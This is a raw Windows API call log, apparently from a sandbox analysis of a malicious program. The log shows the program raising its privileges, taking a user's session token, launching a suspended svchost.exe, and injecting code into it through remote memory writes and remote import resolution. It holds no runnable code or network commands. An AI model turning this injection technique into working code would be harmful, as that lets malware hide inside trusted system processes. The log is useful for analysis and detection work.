	[0153.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="systeminfo32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
	[0153.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x209f78
	[0153.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="systeminfo32", cchWideChar=-1, lpMultiByteStr=0x209f78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="systeminfo32", lpUsedDefaultChar=0x0) returned 13
	[0153.563] lstrcmpiW (lpString1="sTart", lpString2="start") returned 0
	[0153.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0153.563] GetStartupInfoW (in: lpStartupInfo=0x1285c4 | out: lpStartupInfo=0x1285c4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x23078c0, hStdError=0x1d6c70)) 
	[0153.563] LoadLibraryW (lpLibFileName="wtsapi32") returned 0x73f10000
	[0153.563] GetProcAddress (hModule=0x73f10000, lpProcName="WTSEnumerateSessionsA") returned 0x73f14023
	[0153.563] GetProcAddress (hModule=0x73f10000, lpProcName="WTSFreeMemory") returned 0x73f11b65
	[0153.564] GetProcAddress (hModule=0x73f10000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x0
	[0153.564] GetProcAddress (hModule=0x73f10000, lpProcName="WTSQueryUserToken") returned 0x73f11f81
	[0153.564] GetCurrentProcess () returned 0xffffffff
	[0153.564] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x128694 | out: TokenHandle=0x128694*=0x268) returned 1
	[0153.564] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x128650 | out: lpLuid=0x128650*(LowPart=0x7, HighPart=0)) returned 1
	[0153.565] AdjustTokenPrivileges (in: TokenHandle=0x268, DisableAllPrivileges=0, NewState=0x12864c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x128608, ReturnLength=0x128660 | out: PreviousState=0x128608, ReturnLength=0x128660) returned 1
	[0153.565] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x128664, pCount=0x128674 | out: ppSessionInfo=0x128664, pCount=0x128674) returned 1
	[0153.575] WTSFreeMemory (pMemory=0x22a6228) 
	[0153.575] RevertToSelf () returned 1
	[0153.575] WTSQueryUserToken (SessionId=0x1, phToken=0x128684*=0xffffffff) returned 1
	[0153.575] DuplicateTokenEx (in: hExistingToken=0x460, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x128698 | out: phNewToken=0x128698*=0x458) returned 1
	[0153.576] CloseHandle (hObject=0x460) returned 1
	[0153.576] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128690 | out: TokenInformation=0x0, ReturnLength=0x128690) returned 0
	[0153.576] GetLastError () returned 0x7a
	[0153.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6228
	[0153.576] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x22a6228, TokenInformationLength=0x24, ReturnLength=0x128690 | out: TokenInformation=0x22a6228, ReturnLength=0x128690) returned 1
	[0153.576] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6230*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x1282b0, cchName=0x128670, ReferencedDomainName=0x1280b0, cchReferencedDomainName=0x128670, peUse=0x128648 | out: Name="2XC7u663GxWc", cchName=0x128670, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128670, peUse=0x128648) returned 1
	[0153.577] LoadUserProfileW () returned 0x1
	[0153.730] CreateEnvironmentBlock () returned 0x1
	[0153.734] CreateProcessAsUserW (in: hToken=0x458, lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000424, lpEnvironment=0x22c9cc8, lpCurrentDirectory=0x0, lpStartupInfo=0x1285c4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x23078c0, hStdError=0x1d6c70), lpProcessInformation=0x128638 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128638*(hProcess=0x454, hThread=0x388, dwProcessId=0x4d8, dwThreadId=0x9e8)) returned 1
	[0153.740] UnloadUserProfile () returned 0x1
	[0153.745] CloseHandle (hObject=0x458) returned 1
	[0153.745] DestroyEnvironmentBlock () returned 0x1
	[0153.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6228) returned 1
	[0153.745] AdjustTokenPrivileges (in: TokenHandle=0x268, DisableAllPrivileges=0, NewState=0x128608, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0153.745] CloseHandle (hObject=0x268) returned 1
	[0153.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0153.745] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0153.745] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x268
	[0153.746] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458
	[0153.746] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x450
	[0153.746] GetCurrentProcess () returned 0xffffffff
	[0153.746] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x268, hTargetProcessHandle=0x454, lpTargetHandle=0x128710, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128710*=0x4) returned 1
	[0153.746] GetCurrentProcess () returned 0xffffffff
	[0153.746] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x458, hTargetProcessHandle=0x454, lpTargetHandle=0x128714, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128714*=0x8) returned 1
	[0153.746] GetCurrentProcess () returned 0xffffffff
	[0153.746] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x450, hTargetProcessHandle=0x454, lpTargetHandle=0x128718, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128718*=0xc) returned 1
	[0153.746] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0153.747] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1285bc*=0x16f) returned 1
	[0153.748] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.748] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0153.749] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0153.749] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0153.749] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0153.750] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0153.750] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0153.750] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0153.750] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0153.750] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0153.750] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128710*, nSize=0x70, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0x128710*, lpNumberOfBytesWritten=0x1285bc*=0x70) returned 1
	[0153.750] NtQueryInformationProcess (in: ProcessHandle=0x454, ProcessInformationClass=0x0, ProcessInformation=0x1285a4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1285a4, ReturnLength=0x0) returned 0x0
	[0153.751] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x7ffdf000, lpBuffer=0x1285bc, nSize=0x10, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x1285bc*, lpNumberOfBytesRead=0x128448*=0x10) returned 1
	[0153.751] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x600000, lpBuffer=0x128564, nSize=0x40, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x128564*, lpNumberOfBytesRead=0x128448*=0x40) returned 1
	[0153.751] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x6000d8, lpBuffer=0x12846c, nSize=0xf8, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x12846c*, lpNumberOfBytesRead=0x128448*=0xf8) returned 1
	[0153.751] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x602104, lpBuffer=0x128780*, nSize=0xc, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0x128780*, lpNumberOfBytesWritten=0x1285bc*=0xc) returned 1
	[0153.751] ResetEvent (hEvent=0x458) returned 1
	[0153.751] ResetEvent (hEvent=0x268) returned 1
	[0153.751] ResumeThread (hThread=0x388) returned 0x1
	[0153.766] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.766] VirtualAllocEx (hProcess=0x454, lpAddress=0x10000000, dwSize=0x7000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000
	[0153.766] VirtualAllocEx (hProcess=0x454, lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000
	[0153.766] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10000000, lpBuffer=0x26cccc0*, nSize=0x400, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x26cccc0*, lpNumberOfBytesWritten=0x1286e4*=0x400) returned 1
	[0153.767] VirtualProtectEx (in: hProcess=0x454, lpAddress=0x10000000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0153.767] VirtualAllocEx (hProcess=0x454, lpAddress=0x10001000, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000
	[0153.767] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x2800) returned 0x22d3cc0
	[0153.767] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10001000, lpBuffer=0x22d3cc0*, nSize=0x2800, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1286d0*=0x2800) returned 1
	[0153.768] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10001000, lpBuffer=0x26cd0c0*, nSize=0x2800, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x26cd0c0*, lpNumberOfBytesWritten=0x1286e4*=0x2800) returned 1
	[0153.768] VirtualAllocEx (hProcess=0x454, lpAddress=0x10004000, dwSize=0xe00, flAllocationType=0x1000, flProtect=0x4) returned 0x10004000
	[0153.768] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d3cc0, Size=0xe00) returned 0x22d3cc0
	[0153.768] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004000, lpBuffer=0x22d3cc0*, nSize=0xe00, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1286d0*=0xe00) returned 1
	[0153.769] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004000, lpBuffer=0x26cf8c0*, nSize=0xe00, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x26cf8c0*, lpNumberOfBytesWritten=0x1286e4*=0xe00) returned 1
	[0153.769] VirtualAllocEx (hProcess=0x454, lpAddress=0x10005000, dwSize=0x3ec, flAllocationType=0x1000, flProtect=0x4) returned 0x10005000
	[0153.769] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d3cc0, Size=0x3f0) returned 0x22d3cc0
	[0153.769] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10005000, lpBuffer=0x22d3cc0*, nSize=0x3ec, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1286d0*=0x3ec) returned 1
	[0153.769] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10005000, lpBuffer=0x26d06c0*, nSize=0x200, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x26d06c0*, lpNumberOfBytesWritten=0x1286e4*=0x200) returned 1
	[0153.770] VirtualAllocEx (hProcess=0x454, lpAddress=0x10006000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10006000
	[0153.770] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22d3cc0, Size=0x400) returned 0x22d3cc0
	[0153.770] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10006000, lpBuffer=0x22d3cc0*, nSize=0x400, lpNumberOfBytesWritten=0x1286d0 | out: lpBuffer=0x22d3cc0*, lpNumberOfBytesWritten=0x1286d0*=0x400) returned 1
	[0153.770] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10006000, lpBuffer=0x26d08c0*, nSize=0x400, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x26d08c0*, lpNumberOfBytesWritten=0x1286e4*=0x400) returned 1
	[0153.771] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.771] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d02e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0153.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d02e8, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0153.771] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0153.771] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.771] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0153.772] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.772] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.772] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.772] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.772] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.772] ResetEvent (hEvent=0x268) returned 1
	[0153.772] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.773] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.773] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.773] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.773] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.773] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.773] lstrlenA (lpString="GetModuleHandleW") returned 16
	[0153.773] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.773] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d02a4*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d02a4*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.774] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.774] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.774] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.774] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.774] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.774] ResetEvent (hEvent=0x268) returned 1
	[0153.774] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.775] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.775] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.775] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.775] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.775] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004018, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.775] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.775] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.775] lstrlenA (lpString="GetVersionExW") returned 13
	[0153.775] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.776] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d02b8*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d02b8*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0153.776] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.776] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.776] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.776] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.776] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.777] ResetEvent (hEvent=0x268) returned 1
	[0153.777] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.777] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.777] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.777] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.777] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.777] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000401c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.777] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.778] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.778] lstrlenA (lpString="GetProcAddress") returned 14
	[0153.778] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.778] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0292*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0292*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0153.778] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.778] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.778] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.779] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.779] ResetEvent (hEvent=0x268) returned 1
	[0153.779] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.779] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.779] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.779] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.779] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.779] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004020, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.780] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.780] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.780] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0153.780] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.780] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d02d4*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d02d4*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0153.780] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.780] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.780] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.781] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.781] ResetEvent (hEvent=0x268) returned 1
	[0153.781] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.781] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.781] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.782] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.782] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.782] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004024, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
